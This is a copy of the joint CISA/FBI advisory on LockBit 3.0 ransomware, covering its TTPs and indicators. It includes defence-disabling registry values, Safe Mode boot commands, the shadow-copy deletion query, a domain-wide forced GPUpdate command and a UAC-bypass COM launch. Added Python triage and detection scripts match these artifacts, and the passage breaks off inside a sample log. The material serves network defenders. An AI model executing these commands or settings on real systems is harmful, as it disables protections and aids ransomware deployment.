URL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Cybersecurity Advisory


#STOPRANSOMWARE: LOCKBIT 3.0

Release Date
March 16, 2023
Alert Code
AA23-075A
Related topics:
Malware, Phishing, and Ransomware, Cyber Threats and Advisories


ACTIONS TO TAKE TODAY TO MITIGATE CYBER THREATS FROM RANSOMWARE:

 1. Prioritize remediating known exploited vulnerabilities.
 2. Train users to recognize and report phishing attempts.
 3. Enable and enforce phishing-resistant multifactor authentication.


SUMMARY

Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing
#StopRansomware effort to publish advisories for network defenders that detail
ransomware variants and ransomware threat actors. These #StopRansomware
advisories include recently and historically observed tactics, techniques, and
procedures (TTPs) and indicators of compromise (IOCs) to help organizations
protect against ransomware. Visit stopransomware.gov to see all #StopRansomware
advisories and to learn more about other ransomware threats and no-cost
resources.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure
Security Agency (CISA), and the Multi-State Information Sharing & Analysis
Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0
ransomware IOCs and TTPs identified through FBI investigations as recently as
March 2023.

LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS)
model and are a continuation of the previous versions of the ransomware,
LockBit 2.0 and LockBit. Since January 2020, LockBit has functioned as an
affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use
many varying TTPs and attack a wide range of businesses and critical
infrastructure organizations, which can make effective computer network defense
and mitigation challenging.

The FBI, CISA, and the MS-ISAC encourage organizations to implement the
recommendations in the mitigations section of this CSA to reduce the likelihood
and impact of ransomware incidents.

Download the PDF version of this report: #StopRansomware: LockBit 3.0 (PDF, 688.70 KB)


TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12.
See the MITRE ATT&CK Tactics and Techniques section for a table of the threat
actors’ activity mapped to MITRE ATT&CK for Enterprise(link is external).


CAPABILITIES

LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its
previous versions and shares similarities with Blackmatter and Blackcat
ransomware.

LockBit 3.0 is configured upon compilation with many different options that
determine the behavior of the ransomware. Upon the actual execution of the
ransomware within a victim environment, various arguments can be supplied to
further modify its behavior. For example, LockBit 3.0 accepts additional
arguments for specific operations in lateral movement and rebooting into Safe
Mode (see LockBit Command Line Parameters under Indicators of Compromise). If a
LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware,
then a password argument is mandatory during the execution of the ransomware.
LockBit 3.0 affiliates failing to enter the correct password will be unable to
execute the ransomware [T1480.001(link is external)]. The password is a
cryptographic key that decrypts the LockBit 3.0 executable. By protecting the
code in such a manner, LockBit 3.0 hinders malware detection and analysis, as
the code is unexecutable and unreadable in its encrypted form. Signature-based
detections may fail to detect the LockBit 3.0 executable because the
executable's encrypted portion varies with the cryptographic key used for
encryption, which also gives each build a unique hash. When provided the
correct password, LockBit 3.0 will decrypt the main component, continue to
decrypt or decompress its code, and execute the ransomware.

LockBit 3.0 will only infect machines that do not have language settings
matching a defined exclusion list. However, whether a system language is checked
at runtime is determined by a configuration flag originally set at compilation
time. Languages on the exclusion list include, but are not limited to, Romanian
(Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion
list is detected [T1614.001(link is external)], LockBit 3.0 will stop execution
without infecting the system.


INITIAL ACCESS

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim
networks via remote desktop protocol (RDP) exploitation [T1133(link is
external)], drive-by compromise [T1189(link is external)], phishing campaigns
[T1566(link is external)], abuse of valid accounts [T1078(link is external)],
and exploitation of public-facing applications [T1190(link is external)].


EXECUTION AND INFECTION PROCESS

During the malware routine, if privileges are not sufficient, LockBit 3.0
attempts to escalate to the required privileges [TA0004(link is external)].
LockBit 3.0 performs functions such as:

 * Enumerating system information such as hostname, host configuration, domain
   information, local drive configuration, remote shares, and mounted external
   storage devices [T1082(link is external)]
 * Terminating processes and services [T1489(link is external)]
 * Launching commands [TA0002(link is external)]
 * Enabling automatic logon for persistence and privilege escalation [T1547(link
   is external)]
 * Deleting log files, files in the recycle bin folder, and shadow copies
   residing on disk [T1485(link is external)], [T1490(link is external)]

LockBit 3.0 attempts to spread across a victim network by using a preconfigured
list of credentials hardcoded at compilation time or a compromised local account
with elevated privileges [T1078(link is external)]. When compiled, LockBit 3.0
may also enable options for spreading via Group Policy Objects and PsExec using
the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt
[T1486(link is external)] data saved to any local or remote device, but skips
files associated with core system functions.

After files are encrypted, LockBit 3.0 drops a ransom note with the new filename
<Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit
3.0 branding [T1491.001(link is external)]. If needed, LockBit 3.0 will send
encrypted host and bot information to a command and control (C2) server
[T1027(link is external)].

Once completed, LockBit 3.0 may delete itself from the disk [T1070.004(link is
external)] as well as any Group Policy updates that were made, depending on
which options were set at compilation time.


EXFILTRATION

LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously
with LockBit 2.0 [TA0010(link is external)]; rclone, an open-source command line
cloud storage manager [T1567.002(link is external)]; and publicly available file
sharing services, such as MEGA [T1567.002(link is external)], to exfiltrate
sensitive company data files prior to encryption. While rclone and many publicly
available file sharing services are primarily used for legitimate purposes, they
can also be used by threat actors to aid in system compromise, network
exploration, or data exfiltration. LockBit 3.0 affiliates often use other
publicly available file sharing services to exfiltrate data as well [T1567(link
is external)] (see Table 1).



Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System
Encryption

File Sharing Site
 * https://www.premiumize[.]com
 * https://anonfiles[.]com
 * https://www.sendspace[.]com
 * https://fex[.]net
 * https://transfer[.]sh
 * https://send.exploit[.]in


LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS

LockBit affiliates have been observed using various freeware and open-source
tools during their intrusions. These tools are used for a range of activities
such as network reconnaissance, remote access and tunneling, credential dumping,
and file exfiltration. Use of PowerShell and Batch scripts is observed across
most intrusions, focused on system discovery, reconnaissance,
password/credential hunting, and privilege escalation. Artifacts of professional
penetration-testing tools such as Metasploit and Cobalt Strike have also been
observed. See Table 2 for a list of legitimate freeware and open-source tools
LockBit affiliates have repurposed for ransomware operations:



Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates
(Tool: Description. MITRE ATT&CK ID)

 * Chocolatey: Command-line package manager for Windows. T1072(link is external)
 * FileZilla: Cross-platform File Transfer Protocol (FTP) application.
   T1071.002(link is external)
 * Impacket: Collection of Python classes for working with network protocols.
   S0357(link is external)
 * MEGA Ltd MegaSync: Cloud-based synchronization tool. T1567.002(link is
   external)
 * Microsoft Sysinternals ProcDump: Generates crash dumps. Commonly used to dump
   the contents of Local Security Authority Subsystem Service, LSASS.exe.
   T1003.001(link is external)
 * Microsoft Sysinternals PsExec: Execute a command-line process on a remote
   machine. S0029(link is external)
 * Mimikatz: Extracts credentials from system. S0002(link is external)
 * Ngrok: Legitimate remote-access tool abused to bypass victim network
   protections. S0508(link is external)
 * PuTTY Link (Plink): Can be used to automate Secure Shell (SSH) actions on
   Windows. T1572(link is external)
 * Rclone: Command-line program to manage cloud storage files. S1040(link is
   external)
 * SoftPerfect Network Scanner: Performs network scans. T1046(link is external)
 * Splashtop: Remote-desktop software. T1021.001(link is external)
 * WinSCP: SSH File Transfer Protocol client for Windows. T1048(link is
   external)


INDICATORS OF COMPROMISE (IOCS)

The IOCs and malware characteristics outlined below were derived from field
analysis. The following samples are current as of March 2023.

LOCKBIT 3.0 BLACK ICON

[Image: LockBit 3.0 Black icon (not captured in this text rendering)]

LOCKBIT 3.0 WALLPAPER

[Image: LockBit 3.0 wallpaper (not captured in this text rendering)]

LOCKBIT COMMAND LINE PARAMETERS



LockBit Parameter: Description
 * -del: Self-delete.
 * -gdel: Remove LockBit 3.0 group policy changes.
 * -gspd: Spread laterally via group policy.
 * -pass (32 character value): (Required) Password used to launch LockBit 3.0.
 * -path (File or path): Only encrypts provided file or folder.
 * -psex: Spread laterally via admin shares.
 * -safe: Reboot host into Safe Mode.
 * -wall: Sets LockBit 3.0 wallpaper and prints out LockBit 3.0 ransom note.


MUTUAL EXCLUSION OBJECT (MUTEX) CREATED

When executed, LockBit 3.0 will create the mutex Global\<MD4 hash of machine
GUID> and check to see if this mutex has already been created, to avoid running
more than one instance of the ransomware.


UAC BYPASS VIA ELEVATED COM INTERFACE

LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code
with elevated privileges via an elevated Component Object Model (COM) interface.
C:\Windows\System32\dllhost.exe is spawned with high integrity with the command
line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC7.

For example, %SYSTEM32%\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.


VOLUME SHADOW COPY DELETION

LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete
Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query
for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow
copy, and DeleteInstance to delete any shadow copies.


REGISTRY ARTIFACTS



LockBit 3.0 Icon (Registry Key | Value | Data)
 * HKCR\.<Malware Extension> | (Default) | <Malware Extension>
 * HKCR\<Malware Extension>\DefaultIcon | (Default) |
   C:\ProgramData\<Malware Extension>.ico

LockBit 3.0 Wallpaper (Registry Key | Value | Data)
 * HKCU\Control Panel\Desktop\WallPaper | (Default) |
   C:\ProgramData\<Malware Extension>.bmp

Disable Privacy Settings Experience (Registry Key | Value | Data)
 * SOFTWARE\Policies\Microsoft\Windows\OOBE | DisablePrivacyExperience | 0

Enable Automatic Logon (Registry Key | Value | Data)
 * SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | AutoAdminLogon | 1
 * (same key) | DefaultUserName | <username>
 * (same key) | DefaultDomainName | <domain name>
 * (same key) | DefaultPassword | <password>

Disable and Clear Windows Event Logs (Registry Key | Value | Data)
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\* | Enabled | 0
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\*\ChannelAccess |
   ChannelAccess | AO:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA)

Ransom Locations (LockBit 3.0 File Path Locations)
 * ADMIN$\Temp\<LockBit3.0 Filename>.exe
 * %SystemRoot%\Temp\<LockBit3.0 Filename>.exe
 * \<Domain Name>\sysvol\<Domain Name>\scripts\<Lockbit 3.0 Filename>.exe
   (Domain Controller)


SAFE MODE LAUNCH COMMANDS

LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and
detection. Depending upon the host operating system, the following command is
launched to reboot the system to Safe Mode with Networking:



Safe Mode with Networking command, by operating system:
 * Vista and newer: bcdedit /set {current} safeboot network
 * Pre-Vista: bootcfg /raw /a /safeboot:network /id 1

Disable Safe Mode reboot, by operating system:
 * Vista and newer: bcdedit /deletevalue {current} safeboot
 * Pre-Vista: bootcfg /raw /fastdetect /id 1


GROUP POLICY ARTIFACTS

The following are Group Policy Extensible Markup Language (XML) files identified
after a LockBit 3.0 infection:



NetworkShares.xml

<?xml version="1.0" encoding="utf-8"?>
<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">
<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}"
image="2" name="%%ComputerName%%_D" changed="%s" uid="%s">
<Properties action="U" name="%%ComputerName%%_D" path="D:" comment=""
allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE"
abe="NO_CHANGE"/>

Services.xml stops and disables services on the Active Directory (AD) hosts.



Services.xml

<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBENGINE"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0"
removePolicy="0" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLFDLauncher"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLSERVERAGENT"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSASTELEMETRY"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s"
disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay
Client" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s"
disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay
Controller" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MsDtsServer150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISTELEMETRY150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLLaunchpad"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP"
timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLTELEMETRY"
serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLSERVER"
serviceAction="STOP" timeout="60"/>
</NTService>
</NTServices>
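Added example, not part of the advisory and not CISA/FBI tooling: a Python triage helper that parses Group Policy preference XML of the kind shown above (Services.xml and NetworkShares.xml) and lists what the policy would do, so an analyst can confirm the scope of a suspicious GPO from a SYSVOL copy without applying it. The samples embedded below are trimmed from the advisory's fragments; the closing </NetShare> and </NetworkShareSettings> tags, absent from the NetworkShares.xml excerpt above, are assumed.

```python
"""Triage helper for Group Policy preference XML left after a LockBit 3.0
intrusion (Services.xml and NetworkShares.xml). Added example; not CISA/FBI
tooling. Samples are constructed from the advisory's fragments."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: three of the NTService entries shown in the advisory.
SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/>
</NTService>
</NTServices>
"""

# Constructed sample: the advisory's NetworkShares.xml fragment with the
# closing tags (assumed) added so that it parses.
NETWORK_SHARES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">
<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s">
<Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/>
</NetShare>
</NetworkShareSettings>
"""


def parse_services(xml_text):
    """Return one (serviceName, startupType, serviceAction, timeout) per NTService."""
    root = ET.fromstring(xml_text)
    rows = []
    for svc in root.iter("NTService"):
        props = svc.find("Properties")
        if props is None:
            continue
        rows.append((props.get("serviceName"), props.get("startupType"),
                     props.get("serviceAction"), int(props.get("timeout", "0"))))
    return rows


def parse_shares(xml_text):
    """Return one (share name, local path, action) tuple per NetShare."""
    root = ET.fromstring(xml_text)
    rows = []
    for share in root.iter("NetShare"):
        props = share.find("Properties")
        if props is None:
            continue
        rows.append((props.get("name"), props.get("path"), props.get("action")))
    return rows


def stopped_and_disabled(xml_text):
    """Services the policy both stops now and sets to DISABLED, the pattern the
    advisory describes for the SQL services on AD hosts."""
    return [name for name, startup, action, _ in parse_services(xml_text)
            if startup == "DISABLED" and action == "STOP"]


def whole_drive_shares(xml_text):
    """Shares whose path is a bare drive root (e.g. D:), which expose an entire
    volume to the network as in the advisory's %%ComputerName%%_D sample."""
    return [(name, path) for name, path, _ in parse_shares(xml_text)
            if path and re.fullmatch(r"[A-Za-z]:\\?", path)]


if __name__ == "__main__":
    for row in parse_services(SERVICES_XML):
        print("service", *row)
    print("stopped+disabled:", stopped_and_disabled(SERVICES_XML))
    print("whole-drive shares:", whole_drive_shares(NETWORK_SHARES_XML))
```

Run it against the Services.xml and NetworkShares.xml pulled from the domain's SYSVOL share during an investigation; a policy that stops and disables every SQL service and publishes a whole data drive is exactly the combination the advisory describes.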


REGISTRY.POL

The following registry configuration (Registry.pol) changes the Group Policy
refresh time values, disables SmartScreen, and disables Windows Defender.



Registry Key | Registry Value | Value type | Data
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTimeDC |
   REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System |
   GroupPolicyRefreshTimeOffsetDC | REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System | GroupPolicyRefreshTime |
   REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System |
   GroupPolicyRefreshTimeOffset | REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System | EnableSmartScreen |
   REG_DWORD | 0
 * HKLM\SOFTWARE\Policies\Microsoft\Windows\System |
   **del.ShellSmartScreenLevel | REG_SZ | (blank)
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender | DisableAntiSpyware |
   REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender |
   DisableRoutinelyTakingAction | REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection |
   DisableRealtimeMonitoring | REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection |
   DisableBehaviorMonitoring | REG_DWORD | 1
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet |
   SubmitSamplesConsent | REG_DWORD | 2
 * HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet | SpynetReporting |
   REG_DWORD | 0
 * HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile |
   EnableFirewall | REG_DWORD | 0
 * HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile |
   EnableFirewall | REG_DWORD | 0
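Added example, not from the advisory and not CISA/FBI tooling: a Python check that evaluates a registry snapshot against the indicators listed in the Registry Artifacts section and the Registry.pol table above. The snapshot format ({key path: {value name: data}}, as you might build from a .reg export) and all sample data (user name, password, extension name, event channel name) are constructed; keys the advisory lists without a hive are assumed to be under HKLM.

```python
"""Registry indicator check for the LockBit 3.0 artifacts listed in this
advisory. Added example; not CISA/FBI tooling. Keys the advisory gives without
a hive are assumed under HKLM; all sample data below is constructed."""
import re

SDDL_RESTRICTED = "AO:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA)"

# (key path regex, value name regex, expected data regex, label)
INDICATORS = [
    (r"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
     r"AutoAdminLogon", r"1", "automatic logon enabled"),
    (r"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
     r"DefaultPassword", r".+", "logon password stored for AutoAdminLogon"),
    (r"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\[^\\]+",
     r"Enabled", r"0", "event log channel disabled"),
    (r"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\[^\\]+\\ChannelAccess",
     r"ChannelAccess", re.escape(SDDL_RESTRICTED), "event log channel ACL rewritten"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
     r"GroupPolicyRefreshTime(Offset)?(DC)?", r"1", "Group Policy refresh interval forced to 1"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
     r"EnableSmartScreen", r"0", "SmartScreen disabled by policy"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
     r"DisableAntiSpyware|DisableRoutinelyTakingAction", r"1", "Defender disabled by policy"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
     r"DisableRealtimeMonitoring|DisableBehaviorMonitoring", r"1", "Defender real-time protection disabled"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet",
     r"SpynetReporting", r"0", "Defender cloud reporting disabled"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet",
     r"SubmitSamplesConsent", r"2", "Defender sample submission disabled"),
    (r"HKLM\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\(Domain|Standard)Profile",
     r"EnableFirewall", r"0", "firewall profile disabled by policy"),
    (r"HKCR\\[^\\]+\\DefaultIcon",
     r"\(Default\)", r"C:\\ProgramData\\[^\\]+\.ico", "file type icon redirected to ProgramData (ransom branding)"),
    (r"HKCU\\Control Panel\\Desktop\\WallPaper",
     r"\(Default\)", r"C:\\ProgramData\\[^\\]+\.bmp", "wallpaper redirected to ProgramData (ransom branding)"),
]

# Constructed snapshot of a host showing most of the artifacts, plus one benign
# control entry that must not fire.
SAMPLE_SNAPSHOT = {
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon": {
        "AutoAdminLogon": "1", "DefaultUserName": "svc_backup",
        "DefaultDomainName": "CORP", "DefaultPassword": "Example-Password-1"},
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-PowerShell/Operational": {
        "Enabled": "0"},
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-PowerShell/Operational\ChannelAccess": {
        "ChannelAccess": SDDL_RESTRICTED},
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System": {
        "GroupPolicyRefreshTimeDC": "1", "EnableSmartScreen": "0"},
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender": {"DisableAntiSpyware": "1"},
    r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile": {"EnableFirewall": "0"},
    r"HKCR\abcd1234\DefaultIcon": {"(Default)": r"C:\ProgramData\abcd1234.ico"},
    # Benign control: real-time protection explicitly left on.
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection": {
        "DisableRealtimeMonitoring": "0"},
}


def evaluate(snapshot):
    """Match every (key, value, data) in the snapshot against INDICATORS.
    Returns a sorted list of (key, value name, label)."""
    hits = set()
    for key, values in snapshot.items():
        for name, data in values.items():
            for key_rx, name_rx, data_rx, label in INDICATORS:
                if (re.fullmatch(key_rx, key, re.IGNORECASE)
                        and re.fullmatch(name_rx, name, re.IGNORECASE)
                        and re.fullmatch(data_rx, str(data), re.IGNORECASE)):
                    hits.add((key, name, label))
    return sorted(hits)


def summarize(hits):
    """Count hits per label, for a quick triage view."""
    counts = {}
    for _, _, label in hits:
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for key, name, label in evaluate(SAMPLE_SNAPSHOT):
        print(f"{label}: {key} -> {name}")
```

The data regexes deliberately match the exact values the advisory lists (for example SubmitSamplesConsent = 2, EnableFirewall = 0), so a host where an administrator set the same key to a different value is not reported; DefaultUserName and DefaultDomainName are not indicators on their own, only the presence of AutoAdminLogon = 1 and a stored DefaultPassword.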


FORCE GPUPDATE

Once new group policies are added, a PowerShell command using Group Policy
update (GPUpdate) applies the new group policy changes to all computers on the
AD domain.



Force GPUpdate PowerShell Command

powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
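Added example, not part of the advisory and not CISA/FBI tooling: a small Python detector that runs the command-line artifacts quoted in this advisory (the elevated-COM dllhost.exe /Processid launch from the UAC Bypass section, the bcdedit and bootcfg Safe Mode commands, the Win32_ShadowCopy WMI query, the forced Invoke-GPUpdate command above, and the LockBit command line parameters) over process-creation log lines. The log format (timestamp|host|user|image|command line), the host and user names, the search base, the lb3.exe file name, the 32-character password value and the unrelated COM GUID on the benign dllhost line are all constructed for this example.

```python
"""Command-line artifact detection for the LockBit 3.0 behaviours quoted in
this advisory. Added example; not CISA/FBI tooling. Log lines are constructed."""
import re

# (rule name, regex over the process command line, what the advisory ties it to)
RULES = [
    ("uac_bypass_elevated_com",
     r"dllhost\.exe\s*/Processid:\{3E5FC7F9-9A51-4367-9063-A120244FBEC7\}",
     "dllhost.exe spawned with the elevated COM interface GUID (UAC bypass)"),
    ("safe_mode_boot_bcdedit",
     r"\bbcdedit(\.exe)?\b.*\bsafeboot\b",
     "Safe Mode reboot set or cleared with bcdedit (Vista and newer)"),
    ("safe_mode_boot_bootcfg",
     r"\bbootcfg(\.exe)?\b.*/raw\b.*/id 1\b",
     "Safe Mode reboot set or cleared with bootcfg (pre-Vista)"),
    ("shadow_copy_wmi",
     r"Win32_ShadowCopy",
     "Win32_ShadowCopy WMI query on the command line (shadow copy enumeration)"),
    ("forced_gpupdate_domain_wide",
     r"Get-ADComputer\s+-filter\s+\*.*Invoke-GPUpdate.*-force",
     "forced GPUpdate pushed to every computer in the domain"),
    ("lockbit_launch_args",
     r"\s-pass\s+\S{32}(?=\s|$)|\s-(gspd|psex|gdel|wall)\b",
     "LockBit 3.0 command line parameters"),
]

# Constructed process-creation log: timestamp|host|user|image|command line.
# The last two lines are benign controls (an unrelated COM GUID, an editor).
SAMPLE_LOG = """\
2023-03-01T10:14:02Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\dllhost.exe|C:\\Windows\\System32\\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
2023-03-01T10:14:09Z|WS-042|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\bcdedit.exe|bcdedit /set {current} safeboot network
2023-03-01T10:14:10Z|LEGACY-07|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\bootcfg.exe|bootcfg /raw /fastdetect /id 1
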